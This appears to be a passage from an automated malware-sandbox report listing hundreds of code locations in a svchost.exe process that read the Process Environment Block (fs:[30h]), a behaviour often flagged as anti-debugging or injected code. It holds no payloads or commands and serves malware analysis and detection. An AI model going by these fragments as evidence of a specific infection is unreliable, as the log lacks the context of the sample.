Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h] 2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h] 2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h] 2_2_0392826B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h] 2_2_03A0625D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03970185 mov eax, dword ptr fs:[00000030h] 2_2_03970185
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h] 2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
